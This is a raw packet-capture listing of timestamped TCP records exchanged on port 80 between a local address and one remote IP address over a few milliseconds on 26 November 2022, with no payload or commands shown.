Nov 26, 2022 11:17:42.541373968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541376114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541392088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541398048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541420937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541428089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541444063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541445017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541460037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541469097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541492939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541493893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541517973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541524887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541554928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541565895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541610003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541635990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541660070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541682959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541685104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541707993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541712999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541732073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541743994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541754961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541759014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541769981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541778088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541800022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541800976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541815996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541825056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541846991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541851044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541860104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541873932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541894913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541898966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541912079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541924000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541945934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541946888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541969061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541970968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541984081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541991949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542011023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542015076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542037964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542045116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542082071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542092085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542092085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542104006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542128086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542143106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542143106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542150974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542170048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542175055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542197943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542203903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542217970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542221069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542243958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542258978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542258978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542268038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542280912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542290926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542310953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542313099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542329073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542335987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542359114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542361021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542373896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542381048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542402029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542403936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542423010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542428017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542449951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542453051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542465925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542494059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542573929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542597055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542619944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542622089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542638063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542644978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542664051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542669058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542686939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542692900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542711973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542715073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542738914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542738914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542752028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542762995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542785883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542804003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542809963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542834044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542840004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542856932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542865038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542895079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542896032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542895079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542921066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542948008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542970896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542970896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.542994976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.542996883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543018103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543023109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543035030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543042898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543064117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543066025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543088913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543090105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543112993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543116093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543132067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543135881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543158054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543179989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543183088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543206930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543206930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543231964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543240070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543256044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543260098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543270111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543281078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543307066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543313026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543337107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543344975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543359995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543371916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543384075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543387890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543407917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543410063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543422937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543431997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543453932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543462038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543477058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543478966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543512106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543519974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543529034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543543100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543566942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543567896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543586016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543606997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543608904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543663025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543797970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543823004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543847084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543870926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543888092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543893099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543916941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543916941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543931961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543940067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543963909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.543997049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.543997049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544024944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544028044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544048071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544070005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544079065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544094086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544095039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544117928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544123888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544135094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544152975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544171095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544188023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544212103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544234991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544243097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544258118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544281006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544281006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544291973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544305086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544327974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544332027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544352055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544361115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544375896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544385910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544399977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544401884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544416904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544423103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544445992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544454098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544471979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544496059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544511080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544519901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544529915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544529915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544538975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544564962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544583082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544605970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544620991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544631004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544646025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544650078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544668913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544692039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544714928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544719934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544737101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544738054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544760942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544770002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544784069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544785023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544801950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544807911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544832945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544840097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544853926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544856071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544877052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544878960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544903040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544910908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544924974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544928074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544950962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544958115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544975042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.544981956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.544998884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545000076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545022964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545027018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545048952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545049906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545074940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545094013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545098066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545109987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545123100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545145035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545156002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545156002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545170069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545175076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545186043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545192957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545217037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545233011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545242071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545252085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545265913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545272112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545289993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545311928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545321941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545335054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545356035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545357943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545382977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545383930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545406103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545408010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545424938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545429945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545454979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545456886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545469046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545478106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545500994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545500040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545523882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545546055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545550108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545569897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545578957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545593977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545600891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545617104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545624018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545636892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545639992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545664072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545664072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545686960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545697927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545698881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545710087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545730114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545732975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545753956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545779943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545793056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545887947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545912027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545942068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545957088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.545962095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.545980930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546005964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546008110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546027899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546029091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546051979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546056032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546070099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546076059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546099901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546099901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546119928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546123028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546147108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546154976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546169996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546171904 CET	80	49707	66.235.200.147	192.168.2.5
